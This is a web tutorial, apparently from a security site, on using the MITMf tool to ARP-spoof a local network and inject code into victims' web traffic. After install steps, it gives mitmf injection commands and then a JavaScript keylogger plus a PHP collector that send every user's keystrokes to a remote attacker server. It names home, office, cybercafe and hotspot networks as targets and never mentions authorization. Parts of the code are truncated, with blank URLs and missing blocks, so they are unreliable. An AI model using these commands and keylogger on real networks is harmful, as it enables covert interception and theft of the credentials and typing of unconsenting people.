Sniffing & Spoofing

Inject arbitrary code during MITM attack using MITMf

In cryptography and computer security, a MITM attack (man-in-the-middle) is an attack where the attacker secretly relays and possibly alters the communication between two parties who believe they are directly communicating with each other. One example of man-in-the-middle attacks is active eavesdropping, in which the attacker makes independent connections with the victims and relays messages between them to make them believe they are talking directly to each other over a private connection, when in fact the entire conversation is controlled by the attacker. The attacker must be able to intercept all relevant messages passing between the two victims and inject new ones. This is straightforward in many circumstances; for example, an attacker within reception range of an unencrypted wireless access point (Wi-Fi) could insert himself as a man-in-the-middle.

As an attack that aims at circumventing mutual authentication, or lack thereof, a man-in-the-middle attack can succeed only when the attacker can impersonate each endpoint to their satisfaction as expected from the legitimate ends. Most cryptographic protocols include some form of endpoint authentication specifically to prevent MITM attacks. For example, TLS can authenticate one or both parties using a mutually trusted certificate authority.



MITMf aims to provide a one-stop-shop for Man-In-The-Middle and network attacks while updating and improving existing attacks and techniques.

Originally built to address the significant shortcomings of other tools (e.g Ettercap, Mallory), it’s been almost completely re-written from scratch to provide a modular and easily extendible framework that anyone can use to implement their own MITM attack.

  • The framework contains a built-in SMB, HTTP and DNS server that can be controlled and used by the various plugins, it also contains a modified version of the SSLStrip proxy that allows for HTTP modification and a partial HSTS bypass.
  • As of version 0.9.8, MITMf supports active packet filtering and manipulation (basically what etterfilters did, only better), allowing users to modify any type of traffic or protocol.
  • The configuration file can be edited on-the-fly while MITMf is running, the changes will be passed down through the framework: this allows you to tweak settings of plugins and servers while performing an attack.
  • MITMf will capture FTP, IRC, POP, IMAP, Telnet, SMTP, SNMP (community strings), NTLMv1/v2 (all supported protocols like HTTP, SMB, LDAP etc.) and Kerberos credentials by using Net-Creds, which is run on startup.
  • Responder integration allows for LLMNR, NBT-NS and MDNS poisoning and WPAD rogue server support.



Installing MITMf is quite easy and doesn’t require advanced skills. In order to do it just open your terminal and type one by one the below commands.

On Arch Linux

$ pacman -S python2-setuptools libnetfilter_queue libpcap libjpeg-turbo capstone

On Debian and derivatives such as Ubuntu, Kali Linux etc …

$ apt install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev libffi-dev file

If you’re using Arch Linux just remember to use “pip2” instead of “pip” outside of the “virtualenv“.

Install virtualenvwrapper

$ pip install virtualenvwrapper

Edit your .bashrc or .zshrc file to source the script.

$ source /usr/bin/

The location of this script may vary depending on your Linux distro. When you are done simply restart your terminal or run:

$ source /usr/bin/

Create your virtualenv

$ mkvirtualenv MITMf -p /usr/bin/python2.7

Clone the MITMf repository

$ mkdir -p /opt/sniffing-spoofing/
$ cd /opt/sniffing-spoofing/
$ git clone
$ cd MITMf && git submodule init && git submodule update --recursive
$ pip install -r requirements.txt
$ chmod +x

The attack schema is pretty simple actually. The attacking machine needs to connect to a network where another machines are connected. This can be an home network, an office network, a cybercafe network or either a public hotspot.

Once the attacking machine is connected, you will have to run the commands we provided below in order to inject your arbitrary code into all the machines connected in the same network then the attacking machine.

Before to move further you will need to grab your gateway address and your network interface. You can do it simply using “ifconfig” and “iproute” commands as the following examples.

Find my interface name

$ ifconfig


As you can see in the above screenshot, in our case the interface name is “wlp2s0”.

Find my router gateway

$ ip route


From the above output it is clear that is the default gateway IP address.

Inject HTML Code

$ cd ~/
$ mkdir demo && cd demo
$ echo '<div>HTML code to inject</div>' > ~/demo/inject.html
$ mitmf --inject --html-file ~/demo/inject.html --spoof --arp --gateway -i wlp2s0

Inject JS Code

$ cd ~/
$ mkdir demo && cd demo
$ echo '<script type="text/javascript">alert("JS code to inject");</script>' > ~/demo/inject.js
$ mitmf --inject --js-file ~/demo/inject.js --spoof --arp --gateway -i wlp2s0

Important: If you have Apache and/or SMB installed, you will need to stop thoses services before to run MITMf in order to avoid any port conflict.


For the purpose of our test, we will choose the second option, by injecting a Web-Based Keylogger in JavaScript which will be present in every page visited by each machines connected to the network. The keylogger will grab all the users keystrokes and send it to a remote server. We have published few days ago another tutorial explain how to create a web-based keylogger in javascript which can be usefull if you want understand how a keylogger works.

Create JS Keylogger file – keylogger.js

	console.log("jQuery Found");
	console.log("jQuery Not Found");
	var script = document.createElement('script');
	script.src = '';

function c(d)
		dataType: "jsonp",
		url: "", // Your Keylogger URL
		success: function(data)
		error:function(xhr, ajaxOptions, thrownError)

window.onload = function()
	window.addEventListener("keydown", function(e) 

Please be sure to replace “” with the real URL of your PHP file.

Create PHP Keylogger file – keylogger.php

header($_SERVER["SERVER_PROTOCOL"]." 404 Not Found", true, 404);
header('Access-Control-Allow-Methods: GET, REQUEST, OPTIONS');
header('Access-Control-Allow-Credentials: true');
header('Access-Control-Allow-Origin: *');
header('Access-Control-Allow-Headers: Content-Type, *');

$file = 'data.txt';
	$fh = fopen($file, 'w');

function f($str)
	return trim(preg_replace("(\\\)","",htmlentities(strip_tags($str),ENT_QUOTES,'UTF-8')));


$string = $altnKey."|".$ctrlKey."|".$userKey."|".$targKey."|".$userURI."\n";

file_put_contents($file, $string, FILE_APPEND);

The “keylogger.php” must be hosted to a remote server and the full file URL must be specified in the “keylogger.js” file.

Inject the JS file

Now that we are ready with our file, we must inject the JavaScript to the network. To do it, we will use the below command.

$ mitmf --inject --js-file ~/demo/keylogger.js --spoof --arp --gateway -i wlp2s0


You are done ! If you want to see a complete attack and how keystrokes are collected using MITMf, feel free to watch the below video.

Leave a Comment

* By using this form you agree with the storage and handling of your data by this website.

Hey Wait!
Did you know ? You can build your Cyber security or IT career for FREE !
Make yourself happy, join our 8,000 members and receive FREE every day our latest tutorials and webinars to your mailbox!
Yes, Send it Over!
No Thanks!